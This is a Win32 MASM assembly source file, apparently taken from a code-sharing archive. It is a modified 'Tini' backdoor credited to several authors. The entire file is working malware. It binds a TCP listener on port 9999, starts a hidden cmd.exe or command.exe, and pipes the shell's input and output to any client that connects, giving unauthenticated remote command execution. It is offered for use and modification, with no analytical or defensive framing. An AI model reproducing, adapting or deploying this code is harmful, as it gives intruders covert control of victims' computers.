www.pudn.com > Telnetuseage.zip > pipe.asm, change:2004-05-09,size:5249b
;Modify the file Tini2.cpp,
;Tini2.cpp is Made by dangcefire,refdom
;
;Usage :telnet IP 9999
;Tini2 Modify by dengkeng,Write by Win32Asm,Only 1.51K
; EMail:shellc0de@sohu.com
;If you Modify the .asm Please Send Me One :)
.486 ; create 32 bit code
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive
include \masm32\include\windows.inc
include \masm32\include\masm32.inc
include \masm32\include\gdi32.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\Comctl32.inc
include \masm32\include\comdlg32.inc
include \masm32\include\shell32.inc
include \masm32\include\oleaut32.inc
include \masm32\include\wsock32.inc
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\Comctl32.lib
includelib \masm32\lib\comdlg32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\oleaut32.lib
includelib \masm32\lib\wsock32.lib
win2k equ 1
win9x equ 0
TCP_PORT equ 9999
.const
szErrorTitle db 'Error',0
szErrorMsg db 'Init Error',0
szErrorSockMsg db 'Init Sock Error!',0
szErrorBindMsg db 'Init Bind Error!',0
szSucc db 'Succesfull!',0
szSuccTitle db 'Succ!',0
win2kCMD db '\cmd.exe',0
win98CMD db '\command.exe',0
.data?
stWsa WSADATA <?>
RemoteAddr sockaddr_in <?>
startinfo STARTUPINFO <?>
processinfo PROCESS_INFORMATION <?>
;ThreadA
pipeattrA SECURITY_ATTRIBUTES <?>
recv_buff db 1024 dup(?)
nByteToWrite dd ?
nByteWritten dd ?
;ThreadB
pipeattrB SECURITY_ATTRIBUTES <?>
send_buff db 25000 dup(?)
len dd ?
hInstance dd ?
OsType dd ?
ServerSocket dd ?
ClientSocket dd ?
varA dw ?
varB dw ?
dwThreadIDA DWORD ?
dwThreadIDB DWORD ?
hReadPipe HANDLE ?
hWritePipe HANDLE ?
hWriteFile HANDLE ?
hReadFile HANDLE ?
szAPP db 120 dup(?)
.code
GetCMDPath proc
local SysPath[120]:byte
local osvi:OSVERSIONINFO
pushad
invoke GetSystemDirectory,addr SysPath,sizeof SysPath
invoke lstrcpyn,addr szAPP,addr SysPath,sizeof SysPath
;invoke MessageBox, NULL,addr szAPP, addr szSucc, MB_OK
mov osvi.dwOSVersionInfoSize,sizeof OSVERSIONINFO
invoke GetVersionEx,addr osvi
mov edx,osvi.dwPlatformId
.if edx==2
invoke lstrcat,addr szAPP,addr win2kCMD
mov dword ptr [OsType],win2k
.else
invoke lstrcat,addr szAPP,addr win98CMD
mov dword ptr [OsType],win9x
.endif
;invoke MessageBox, NULL,addr szAPP, addr szSucc, MB_OK
popad
ret
GetCMDPath endp
ThreadFuncA proc uses eax ,lpParam:DWORD
mov pipeattrA.nLength,sizeof SECURITY_ATTRIBUTES
mov pipeattrA.lpSecurityDescriptor,NULL
mov pipeattrA.bInheritHandle,TRUE
invoke CreatePipe,addr hReadPipe,addr hWriteFile,addr pipeattrA,0
mov word ptr [varA],1
@@3:
invoke Sleep,250
invoke recv,ClientSocket,addr recv_buff,1024,0
mov nByteToWrite,eax
invoke WriteFile,hWriteFile,addr recv_buff,nByteToWrite,addr nByteWritten,NULL
jmp @@3
ret
ThreadFuncA endp
ThreadFuncB proc uses eax ,lpParam:DWORD
mov pipeattrB.nLength,sizeof SECURITY_ATTRIBUTES
mov pipeattrB.lpSecurityDescriptor,NULL
mov pipeattrB.bInheritHandle,TRUE
invoke CreatePipe,addr hReadFile,addr hWritePipe,addr pipeattrB,0
mov word ptr [varB],1
@@2:
invoke ReadFile,hReadFile,addr send_buff,25000,addr len,NULL
invoke send,ClientSocket,addr send_buff,len,0
jmp @@2
ret
ThreadFuncB endp
start:
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke GetCMDPath
invoke WSAStartup,0002h,addr stWsa
.if eax
invoke MessageBox,NULL,addr szErrorMsg,addr szErrorTitle,MB_OK
invoke ExitProcess,NULL
.endif
invoke socket,AF_INET,SOCK_STREAM,IPPROTO_TCP
.if eax!=INVALID_SOCKET
mov ServerSocket,eax
.else
invoke MessageBox,NULL,addr szErrorSockMsg,addr szErrorTitle,MB_OK
invoke ExitProcess,NULL
.endif
mov RemoteAddr.sin_family,AF_INET
invoke htons,TCP_PORT
mov RemoteAddr.sin_port,ax
mov RemoteAddr.sin_addr,INADDR_ANY
invoke bind,ServerSocket,addr RemoteAddr,sizeof sockaddr_in
.if eax==SOCKET_ERROR
invoke MessageBox,NULL,addr szErrorBindMsg,addr szErrorTitle,MB_OK
invoke ExitProcess,NULL
.else
invoke listen,ServerSocket,5
.endif
xor edx,edx
mov varA,dx
mov varB,dx
invoke CreateThread,NULL,NULL,offset ThreadFuncA,NULL,0,addr dwThreadIDA
invoke CreateThread,NULL,NULL,offset ThreadFuncB,NULL,NULL,addr dwThreadIDB
@@1:
invoke Sleep,250
mov dx,varA
cmp dx,1
jnz @@1
and dx,varB
cmp dx,1
jnz @@1
invoke GetStartupInfo,addr startinfo
mov startinfo.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
mov edx,hReadPipe
mov startinfo.hStdInput,edx
mov edx,hWritePipe
mov startinfo.hStdError,edx
mov startinfo.hStdOutput,edx
mov startinfo.wShowWindow,SW_HIDE
invoke CreateProcess,addr szAPP,NULL, NULL, NULL, TRUE, 0,NULL, NULL, addr startinfo, addr processinfo
@@11:
invoke accept,ServerSocket,NULL,NULL
mov ClientSocket,eax
invoke Sleep,250
jmp @@11
invoke ExitProcess,NULL
end start